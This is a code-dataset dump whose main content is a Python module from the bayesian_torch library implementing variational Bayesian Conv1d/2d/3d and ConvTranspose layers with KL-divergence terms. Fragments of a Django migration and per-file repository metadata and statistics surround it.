u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '80', 'blank': 'True'}),
'session_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'})
}
}
complete_apps = ['whisk_tutorial']
| 63.785714
| 145
| 0.638778
| 696
| 6,251
| 5.537356
| 0.133621
| 0.083031
| 0.141671
| 0.202387
| 0.845615
| 0.840426
| 0.81863
| 0.796834
| 0.73015
| 0.687338
| 0
| 0.006715
| 0.166213
| 6,251
| 98
| 146
| 63.785714
| 0.732732
| 0.117261
| 0
| 0.15873
| 0
| 0
| 0.547338
| 0.367981
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031746
| false
| 0
| 0.063492
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43114001dd68717348984363b71c1caa59b2aaaa
| 38,460
|
py
|
Python
|
bayesian_torch/layers/variational_layers/conv_variational.py
|
JunhoPark0314/bayesian-torch
|
1590cc483ae7649cd60aad2886ae95f32bea0dbe
|
[
"BSD-3-Clause"
] | 117
|
2021-01-12T11:14:09.000Z
|
2022-03-27T08:04:35.000Z
|
bayesian_torch/layers/variational_layers/conv_variational.py
|
JunhoPark0314/bayesian-torch
|
1590cc483ae7649cd60aad2886ae95f32bea0dbe
|
[
"BSD-3-Clause"
] | 12
|
2021-04-01T10:36:51.000Z
|
2021-12-16T21:51:30.000Z
|
bayesian_torch/layers/variational_layers/conv_variational.py
|
JunhoPark0314/bayesian-torch
|
1590cc483ae7649cd60aad2886ae95f32bea0dbe
|
[
"BSD-3-Clause"
] | 17
|
2021-01-13T13:16:54.000Z
|
2022-03-06T16:28:45.000Z
|
# Copyright (C) 2021 Intel Labs
#
# BSD-3-Clause License
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#
# Convolutional Layers with reparameterization estimator to perform variational
# inference in Bayesian neural networks. Reparameterization layers
# enables Monte Carlo approximation of the distribution over 'kernel' and 'bias'.
#
# Kullback-Leibler divergence between the surrogate posterior and prior is computed
# and returned along with the tensors of outputs after convolution operation, which is
# required to compute Evidence Lower Bound (ELBO).
#
# @authors: Ranganath Krishnan
#
# ======================================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import Parameter
from ..base_variational_layer import BaseVariationalLayer_
import math
__all__ = [
'Conv1dReparameterization',
'Conv2dReparameterization',
'Conv3dReparameterization',
'ConvTranspose1dReparameterization',
'ConvTranspose2dReparameterization',
'ConvTranspose3dReparameterization',
]
class Conv1dReparameterization(BaseVariationalLayer_):
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
groups=1,
prior_mean=0,
prior_variance=1,
posterior_mu_init=0,
posterior_rho_init=-3.0,
bias=True):
"""
Implements Conv1d layer with reparameterization trick.
Inherits from bayesian_torch.layers.BaseVariationalLayer_
Parameters:
in_channels: int -> number of channels in the input image,
out_channels: int -> number of channels produced by the convolution,
kernel_size: int -> size of the convolving kernel,
stride: int -> stride of the convolution. Default: 1,
padding: int -> zero-padding added to both sides of the input. Default: 0,
dilation: int -> spacing between kernel elements. Default: 1,
groups: int -> number of blocked connections from input channels to output channels,
prior_mean: float -> mean of the prior arbitrary distribution to be used on the complexity cost,
prior_variance: float -> variance of the prior arbitrary distribution to be used on the complexity cost,
posterior_mu_init: float -> init trainable mu parameter representing mean of the approximate posterior,
posterior_rho_init: float -> init trainable rho parameter representing the sigma of the approximate posterior through softplus function,
bias: bool -> if set to False, the layer will not learn an additive bias. Default: True,
"""
super(Conv1dReparameterization, self).__init__()
if in_channels % groups != 0:
raise ValueError('invalid in_channels size')
if out_channels % groups != 0:
raise ValueError('invalid in_channels size')
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
self.prior_mean = prior_mean
self.prior_variance = prior_variance
self.posterior_mu_init = posterior_mu_init, # mean of weight
# variance of weight --> sigma = log (1 + exp(rho))
self.posterior_rho_init = posterior_rho_init,
self.bias = bias
self.mu_kernel = Parameter(
torch.Tensor(out_channels, in_channels // groups, kernel_size))
self.rho_kernel = Parameter(
torch.Tensor(out_channels, in_channels // groups, kernel_size))
self.register_buffer(
'eps_kernel',
torch.Tensor(out_channels, in_channels // groups, kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_mu',
torch.Tensor(out_channels, in_channels // groups, kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_sigma',
torch.Tensor(out_channels, in_channels // groups, kernel_size),
persistent=False)
if self.bias:
self.mu_bias = Parameter(torch.Tensor(out_channels))
self.rho_bias = Parameter(torch.Tensor(out_channels))
self.register_buffer('eps_bias', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_mu', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_sigma',
torch.Tensor(out_channels),
persistent=False)
else:
self.register_parameter('mu_bias', None)
self.register_parameter('rho_bias', None)
self.register_buffer('eps_bias', None)
self.register_buffer('prior_bias_mu', None, persistent=False)
self.register_buffer('prior_bias_sigma', None, persistent=False)
self.init_parameters()
def init_parameters(self):
self.prior_weight_mu.data.fill_(self.prior_mean)
self.prior_weight_sigma.fill_(self.prior_variance)
self.mu_kernel.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_kernel.data.normal_(mean=self.posterior_rho_init[0], std=0.1)
if self.bias:
self.prior_bias_mu.data.fill_(self.prior_mean)
self.prior_bias_sigma.fill_(self.prior_variance)
self.mu_bias.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_bias.data.normal_(mean=self.posterior_rho_init[0],
std=0.1)
def forward(self, input):
sigma_weight = torch.log1p(torch.exp(self.rho_kernel))
eps_kernel = self.eps_kernel.data.normal_()
weight = self.mu_kernel + (sigma_weight * eps_kernel)
kl_weight = self.kl_div(self.mu_kernel, sigma_weight,
self.prior_weight_mu, self.prior_weight_sigma)
bias = None
if self.bias:
sigma_bias = torch.log1p(torch.exp(self.rho_bias))
eps_bias = self.eps_bias.data.normal_()
bias = self.mu_bias + (sigma_bias * eps_bias)
kl_bias = self.kl_div(self.mu_bias, sigma_bias, self.prior_bias_mu,
self.prior_bias_sigma)
out = F.conv1d(input, weight, bias, self.stride, self.padding,
self.dilation, self.groups)
if self.bias:
kl = kl_weight + kl_bias
else:
kl = kl_weight
return out, kl
class Conv2dReparameterization(BaseVariationalLayer_):
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
groups=1,
prior_mean=0,
prior_variance=1,
posterior_mu_init=0,
posterior_rho_init=-3.0,
bias=True):
"""
Implements Conv2d layer with reparameterization trick.
Inherits from bayesian_torch.layers.BaseVariationalLayer_
Parameters:
in_channels: int -> number of channels in the input image,
out_channels: int -> number of channels produced by the convolution,
kernel_size: int -> size of the convolving kernel,
stride: int -> stride of the convolution. Default: 1,
padding: int -> zero-padding added to both sides of the input. Default: 0,
dilation: int -> spacing between kernel elements. Default: 1,
groups: int -> number of blocked connections from input channels to output channels,
prior_mean: float -> mean of the prior arbitrary distribution to be used on the complexity cost,
prior_variance: float -> variance of the prior arbitrary distribution to be used on the complexity cost,
posterior_mu_init: float -> init trainable mu parameter representing mean of the approximate posterior,
posterior_rho_init: float -> init trainable rho parameter representing the sigma of the approximate posterior through softplus function,
bias: bool -> if set to False, the layer will not learn an additive bias. Default: True,
"""
super(Conv2dReparameterization, self).__init__()
if in_channels % groups != 0:
raise ValueError('invalid in_channels size')
if out_channels % groups != 0:
raise ValueError('invalid in_channels size')
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
self.prior_mean = prior_mean
self.prior_variance = prior_variance
self.posterior_mu_init = posterior_mu_init, # mean of weight
# variance of weight --> sigma = log (1 + exp(rho))
self.posterior_rho_init = posterior_rho_init,
self.bias = bias
self.mu_kernel = Parameter(
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size))
self.rho_kernel = Parameter(
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size))
self.register_buffer(
'eps_kernel',
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_mu',
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_sigma',
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size),
persistent=False)
if self.bias:
self.mu_bias = Parameter(torch.Tensor(out_channels))
self.rho_bias = Parameter(torch.Tensor(out_channels))
self.register_buffer('eps_bias', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_mu', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_sigma',
torch.Tensor(out_channels),
persistent=False)
else:
self.register_parameter('mu_bias', None)
self.register_parameter('rho_bias', None)
self.register_buffer('eps_bias', None, persistent=False)
self.register_buffer('prior_bias_mu', None, persistent=False)
self.register_buffer('prior_bias_sigma', None, persistent=False)
self.init_parameters()
def init_parameters(self):
self.prior_weight_mu.fill_(self.prior_mean)
self.prior_weight_sigma.fill_(self.prior_variance)
self.mu_kernel.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_kernel.data.normal_(mean=self.posterior_rho_init[0], std=0.1)
if self.bias:
self.prior_bias_mu.fill_(self.prior_mean)
self.prior_bias_sigma.fill_(self.prior_variance)
self.mu_bias.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_bias.data.normal_(mean=self.posterior_rho_init[0],
std=0.1)
def forward(self, input):
sigma_weight = torch.log1p(torch.exp(self.rho_kernel))
eps_kernel = self.eps_kernel.data.normal_()
weight = self.mu_kernel + (sigma_weight * eps_kernel)
kl_weight = self.kl_div(self.mu_kernel, sigma_weight,
self.prior_weight_mu, self.prior_weight_sigma)
bias = None
if self.bias:
sigma_bias = torch.log1p(torch.exp(self.rho_bias))
eps_bias = self.eps_bias.data.normal_()
bias = self.mu_bias + (sigma_bias * eps_bias)
kl_bias = self.kl_div(self.mu_bias, sigma_bias, self.prior_bias_mu,
self.prior_bias_sigma)
out = F.conv2d(input, weight, bias, self.stride, self.padding,
self.dilation, self.groups)
if self.bias:
kl = kl_weight + kl_bias
else:
kl = kl_weight
return out, kl
class Conv3dReparameterization(BaseVariationalLayer_):
def __init__(self,
in_channels,
out_channels,
kernel_size,
prior_mean,
prior_variance,
posterior_mu_init,
posterior_rho_init,
stride=1,
padding=0,
dilation=1,
groups=1,
bias=True):
"""
Implements Conv3d layer with reparameterization trick.
Inherits from bayesian_torch.layers.BaseVariationalLayer_
Parameters:
in_channels: int -> number of channels in the input image,
out_channels: int -> number of channels produced by the convolution,
kernel_size: int -> size of the convolving kernel,
stride: int -> stride of the convolution. Default: 1,
padding: int -> zero-padding added to both sides of the input. Default: 0,
dilation: int -> spacing between kernel elements. Default: 1,
groups: int -> number of blocked connections from input channels to output channels,
prior_mean: float -> mean of the prior arbitrary distribution to be used on the complexity cost,
prior_variance: float -> variance of the prior arbitrary distribution to be used on the complexity cost,
posterior_mu_init: float -> init trainable mu parameter representing mean of the approximate posterior,
posterior_rho_init: float -> init trainable rho parameter representing the sigma of the approximate posterior through softplus function,
bias: bool -> if set to False, the layer will not learn an additive bias. Default: True,
"""
super(Conv3dReparameterization, self).__init__()
if in_channels % groups != 0:
raise ValueError('invalid in_channels size')
if out_channels % groups != 0:
raise ValueError('invalid in_channels size')
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
self.prior_mean = prior_mean
self.prior_variance = prior_variance
self.posterior_mu_init = posterior_mu_init, # mean of weight
# variance of weight --> sigma = log (1 + exp(rho))
self.posterior_rho_init = posterior_rho_init,
self.bias = bias
self.mu_kernel = Parameter(
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size, kernel_size))
self.rho_kernel = Parameter(
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size, kernel_size))
self.register_buffer(
'eps_kernel',
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size, kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_mu',
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size, kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_sigma',
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size, kernel_size),
persistent=False)
if self.bias:
self.mu_bias = Parameter(torch.Tensor(out_channels))
self.rho_bias = Parameter(torch.Tensor(out_channels))
self.register_buffer('eps_bias', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_mu', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_sigma',
torch.Tensor(out_channels),
persistent=False)
else:
self.register_parameter('mu_bias', None)
self.register_parameter('rho_bias', None)
self.register_buffer('eps_bias', None, persistent=False)
self.register_buffer('prior_bias_mu', None, persistent=False)
self.register_buffer('prior_bias_sigma', None, persistent=False)
self.init_parameters()
def init_parameters(self):
self.prior_weight_mu.fill_(self.prior_mean)
self.prior_weight_sigma.fill_(self.prior_variance)
self.mu_kernel.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_kernel.data.normal_(mean=self.posterior_rho_init[0], std=0.1)
if self.bias:
self.prior_bias_mu.fill_(self.prior_mean)
self.prior_bias_sigma.fill_(self.prior_variance)
self.mu_bias.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_bias.data.normal_(mean=self.posterior_rho_init[0],
std=0.1)
def forward(self, input):
sigma_weight = torch.log1p(torch.exp(self.rho_kernel))
eps_kernel = self.eps_kernel.data.normal_()
weight = self.mu_kernel + (sigma_weight * eps_kernel)
kl_weight = self.kl_div(self.mu_kernel, sigma_weight,
self.prior_weight_mu, self.prior_weight_sigma)
bias = None
if self.bias:
sigma_bias = torch.log1p(torch.exp(self.rho_bias))
eps_bias = self.eps_bias.data.normal_()
bias = self.mu_bias + (sigma_bias * eps_bias)
kl_bias = self.kl_div(self.mu_bias, sigma_bias, self.prior_bias_mu,
self.prior_bias_sigma)
out = F.conv3d(input, weight, bias, self.stride, self.padding,
self.dilation, self.groups)
if self.bias:
kl = kl_weight + kl_bias
else:
kl = kl_weight
return out, kl
class ConvTranspose1dReparameterization(BaseVariationalLayer_):
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
groups=1,
output_padding=0,
prior_mean=0,
prior_variance=1,
posterior_mu_init=0,
posterior_rho_init=-3.0,
bias=True):
"""
Implements ConvTranspose1d layer with reparameterization trick.
Inherits from bayesian_torch.layers.BaseVariationalLayer_
Parameters:
in_channels: int -> number of channels in the input image,
out_channels: int -> number of channels produced by the convolution,
kernel_size: int -> size of the convolving kernel,
stride: int -> stride of the convolution. Default: 1,
padding: int -> zero-padding added to both sides of the input. Default: 0,
dilation: int -> spacing between kernel elements. Default: 1,
groups: int -> number of blocked connections from input channels to output channels,
prior_mean: float -> mean of the prior arbitrary distribution to be used on the complexity cost,
prior_variance: float -> variance of the prior arbitrary distribution to be used on the complexity cost,
posterior_mu_init: float -> init trainable mu parameter representing mean of the approximate posterior,
posterior_rho_init: float -> init trainable rho parameter representing the sigma of the approximate posterior through softplus function,
bias: bool -> if set to False, the layer will not learn an additive bias. Default: True,
"""
super(ConvTranspose1dReparameterization, self).__init__()
if in_channels % groups != 0:
raise ValueError('invalid in_channels size')
if out_channels % groups != 0:
raise ValueError('invalid in_channels size')
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.output_padding = output_padding
self.dilation = dilation
self.groups = groups
self.prior_mean = prior_mean
self.prior_variance = prior_variance
self.posterior_mu_init = posterior_mu_init, # mean of weight
# variance of weight --> sigma = log (1 + exp(rho))
self.posterior_rho_init = posterior_rho_init,
self.bias = bias
self.mu_kernel = Parameter(
torch.Tensor(in_channels, out_channels // groups, kernel_size))
self.rho_kernel = Parameter(
torch.Tensor(in_channels, out_channels // groups, kernel_size))
self.register_buffer(
'eps_kernel',
torch.Tensor(in_channels, out_channels // groups, kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_mu',
torch.Tensor(in_channels, out_channels // groups, kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_sigma',
torch.Tensor(in_channels, out_channels // groups, kernel_size),
persistent=False)
if self.bias:
self.mu_bias = Parameter(torch.Tensor(out_channels))
self.rho_bias = Parameter(torch.Tensor(out_channels))
self.register_buffer('eps_bias', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_mu', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_sigma',
torch.Tensor(out_channels),
persistent=False)
else:
self.register_parameter('mu_bias', None)
self.register_parameter('rho_bias', None)
self.register_buffer('eps_bias', None, persistent=False)
self.register_buffer('prior_bias_mu', None, persistent=False)
self.register_buffer('prior_bias_sigma', None, persistent=False)
self.init_parameters()
def init_parameters(self):
self.prior_weight_mu.fill_(self.prior_mean)
self.prior_weight_sigma.fill_(self.prior_variance)
self.mu_kernel.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_kernel.data.normal_(mean=self.posterior_rho_init[0], std=0.1)
if self.bias:
self.prior_bias_mu.fill_(self.prior_mean)
self.prior_bias_sigma.fill_(self.prior_variance)
self.mu_bias.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_bias.data.normal_(mean=self.posterior_rho_init[0],
std=0.1)
def forward(self, input):
sigma_weight = torch.log1p(torch.exp(self.rho_kernel))
eps_kernel = self.eps_kernel.data.normal_()
weight = self.mu_kernel + (sigma_weight * eps_kernel)
kl_weight = self.kl_div(self.mu_kernel, sigma_weight,
self.prior_weight_mu, self.prior_weight_sigma)
bias = None
if self.bias:
sigma_bias = torch.log1p(torch.exp(self.rho_bias))
eps_bias = self.eps_bias.data.normal_()
bias = self.mu_bias + (sigma_bias * eps_bias)
kl_bias = self.kl_div(self.mu_bias, sigma_bias, self.prior_bias_mu,
self.prior_bias_sigma)
out = F.conv_transpose1d(input, weight, bias, self.stride,
self.padding, self.output_padding,
self.dilation, self.groups)
if self.bias:
kl = kl_weight + kl_bias
else:
kl = kl_weight
return out, kl
class ConvTranspose2dReparameterization(BaseVariationalLayer_):
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
groups=1,
output_padding=0,
prior_mean=0,
prior_variance=1,
posterior_mu_init=0,
posterior_rho_init=-3.0,
bias=True):
"""
Implements ConvTranspose2d layer with reparameterization trick.
Inherits from bayesian_torch.layers.BaseVariationalLayer_
Parameters:
in_channels: int -> number of channels in the input image,
out_channels: int -> number of channels produced by the convolution,
kernel_size: int -> size of the convolving kernel,
stride: int -> stride of the convolution. Default: 1,
padding: int -> zero-padding added to both sides of the input. Default: 0,
dilation: int -> spacing between kernel elements. Default: 1,
groups: int -> number of blocked connections from input channels to output channels,
prior_mean: float -> mean of the prior arbitrary distribution to be used on the complexity cost,
prior_variance: float -> variance of the prior arbitrary distribution to be used on the complexity cost,
posterior_mu_init: float -> init trainable mu parameter representing mean of the approximate posterior,
posterior_rho_init: float -> init trainable rho parameter representing the sigma of the approximate posterior through softplus function,
bias: bool -> if set to False, the layer will not learn an additive bias. Default: True,
"""
super(ConvTranspose2dReparameterization, self).__init__()
if in_channels % groups != 0:
raise ValueError('invalid in_channels size')
if out_channels % groups != 0:
raise ValueError('invalid in_channels size')
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.output_padding = output_padding
self.dilation = dilation
self.groups = groups
self.prior_mean = prior_mean
self.prior_variance = prior_variance
self.posterior_mu_init = posterior_mu_init, # mean of weight
# variance of weight --> sigma = log (1 + exp(rho))
self.posterior_rho_init = posterior_rho_init,
self.bias = bias
self.mu_kernel = Parameter(
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size))
self.rho_kernel = Parameter(
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size))
self.register_buffer(
'eps_kernel',
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_mu',
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_sigma',
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size),
persistent=False)
if self.bias:
self.mu_bias = Parameter(torch.Tensor(out_channels))
self.rho_bias = Parameter(torch.Tensor(out_channels))
self.register_buffer('eps_bias', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_mu', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_sigma',
torch.Tensor(out_channels),
persistent=False)
else:
self.register_parameter('mu_bias', None)
self.register_parameter('rho_bias', None)
self.register_buffer('eps_bias', None, persistent=False)
self.register_buffer('prior_bias_mu', None, persistent=False)
self.register_buffer('prior_bias_sigma', None, persistent=False)
self.init_parameters()
def init_parameters(self):
self.prior_weight_mu.fill_(self.prior_mean)
self.prior_weight_sigma.fill_(self.prior_variance)
self.mu_kernel.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_kernel.data.normal_(mean=self.posterior_rho_init[0], std=0.1)
if self.bias:
self.prior_bias_mu.fill_(self.prior_mean)
self.prior_bias_sigma.fill_(self.prior_variance)
self.mu_bias.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_bias.data.normal_(mean=self.posterior_rho_init[0],
std=0.1)
def forward(self, input):
sigma_weight = torch.log1p(torch.exp(self.rho_kernel))
eps_kernel = self.eps_kernel.data.normal_()
weight = self.mu_kernel + (sigma_weight * eps_kernel)
kl_weight = self.kl_div(self.mu_kernel, sigma_weight,
self.prior_weight_mu, self.prior_weight_sigma)
bias = None
if self.bias:
sigma_bias = torch.log1p(torch.exp(self.rho_bias))
eps_bias = self.eps_bias.data.normal_()
bias = self.mu_bias + (sigma_bias * eps_bias)
kl_bias = self.kl_div(self.mu_bias, sigma_bias, self.prior_bias_mu,
self.prior_bias_sigma)
out = F.conv_transpose2d(input, weight, bias, self.stride,
self.padding, self.output_padding,
self.dilation, self.groups)
if self.bias:
kl = kl_weight + kl_bias
else:
kl = kl_weight
return out, kl
class ConvTranspose3dReparameterization(BaseVariationalLayer_):
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
groups=1,
output_padding=0,
prior_mean=0,
prior_variance=1,
posterior_mu_init=0,
posterior_rho_init=-3.0,
bias=True):
"""
Implements ConvTranspose3d layer with reparameterization trick.
Inherits from bayesian_torch.layers.BaseVariationalLayer_
Parameters:
in_channels: int -> number of channels in the input image,
out_channels: int -> number of channels produced by the convolution,
kernel_size: int -> size of the convolving kernel,
stride: int -> stride of the convolution. Default: 1,
padding: int -> zero-padding added to both sides of the input. Default: 0,
dilation: int -> spacing between kernel elements. Default: 1,
groups: int -> number of blocked connections from input channels to output channels,
prior_mean: float -> mean of the prior arbitrary distribution to be used on the complexity cost,
prior_variance: float -> variance of the prior arbitrary distribution to be used on the complexity cost,
posterior_mu_init: float -> init trainable mu parameter representing mean of the approximate posterior,
posterior_rho_init: float -> init trainable rho parameter representing the sigma of the approximate posterior through softplus function,
bias: bool -> if set to False, the layer will not learn an additive bias. Default: True,
"""
super(ConvTranspose3dReparameterization, self).__init__()
if in_channels % groups != 0:
raise ValueError('invalid in_channels size')
if out_channels % groups != 0:
raise ValueError('invalid in_channels size')
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.output_padding = output_padding
self.dilation = dilation
self.groups = groups
self.prior_mean = prior_mean
self.prior_variance = prior_variance
self.posterior_mu_init = posterior_mu_init, # mean of weight
# variance of weight --> sigma = log (1 + exp(rho))
self.posterior_rho_init = posterior_rho_init,
self.bias = bias
self.mu_kernel = Parameter(
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size, kernel_size))
self.rho_kernel = Parameter(
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size, kernel_size))
self.register_buffer(
'eps_kernel',
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size, kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_mu',
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size, kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_sigma',
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size, kernel_size),
persistent=False)
if self.bias:
self.mu_bias = Parameter(torch.Tensor(out_channels))
self.rho_bias = Parameter(torch.Tensor(out_channels))
self.register_buffer('eps_bias', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_mu', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_sigma',
torch.Tensor(out_channels),
persistent=False)
else:
self.register_parameter('mu_bias', None)
self.register_parameter('rho_bias', None)
self.register_buffer('eps_bias', None, persistent=False)
self.register_buffer('prior_bias_mu', None, persistent=False)
self.register_buffer('prior_bias_sigma', None, persistent=False)
self.init_parameters()
def init_parameters(self):
self.prior_weight_mu.fill_(self.prior_mean)
self.prior_weight_sigma.fill_(self.prior_variance)
self.mu_kernel.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_kernel.data.normal_(mean=self.posterior_rho_init[0], std=0.1)
if self.bias:
self.prior_bias_mu.fill_(self.prior_mean)
self.prior_bias_sigma.fill_(self.prior_variance)
self.mu_bias.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_bias.data.normal_(mean=self.posterior_rho_init[0],
std=0.1)
def forward(self, input):
sigma_weight = torch.log1p(torch.exp(self.rho_kernel))
eps_kernel = self.eps_kernel.data.normal_()
weight = self.mu_kernel + (sigma_weight * eps_kernel)
kl_weight = self.kl_div(self.mu_kernel, sigma_weight,
self.prior_weight_mu, self.prior_weight_sigma)
bias = None
if self.bias:
sigma_bias = torch.log1p(torch.exp(self.rho_bias))
eps_bias = self.eps_bias.data.normal_()
bias = self.mu_bias + (sigma_bias * eps_bias)
kl_bias = self.kl_div(self.mu_bias, sigma_bias, self.prior_bias_mu,
self.prior_bias_sigma)
out = F.conv_transpose3d(input, weight, bias, self.stride,
self.padding, self.output_padding,
self.dilation, self.groups)
if self.bias:
kl = kl_weight + kl_bias
else:
kl = kl_weight
return out, kl
| 45.353774
| 148
| 0.620177
| 4,498
| 38,460
| 5.058693
| 0.060916
| 0.043509
| 0.042718
| 0.043509
| 0.896678
| 0.894568
| 0.894568
| 0.894568
| 0.892854
| 0.892854
| 0
| 0.007795
| 0.299558
| 38,460
| 847
| 149
| 45.40732
| 0.836854
| 0.245346
| 0
| 0.930464
| 0
| 0
| 0.04442
| 0.006072
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029801
| false
| 0
| 0.014901
| 0
| 0.06457
| 0.001656
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a3ffa7d49614bc9d04c0291edf6bc5dcc507c64
| 122
|
py
|
Python
|
cognito/__init__.py
|
vandana-11/cognito
|
4f92229511b265578def8e34d30575292070e584
|
[
"BSD-3-Clause"
] | 11
|
2020-01-27T13:30:44.000Z
|
2021-06-04T01:08:27.000Z
|
cognito/__init__.py
|
vandana-11/cognito
|
4f92229511b265578def8e34d30575292070e584
|
[
"BSD-3-Clause"
] | 25
|
2020-02-10T12:57:59.000Z
|
2020-05-09T18:17:58.000Z
|
cognito/__init__.py
|
vandana-11/cognito
|
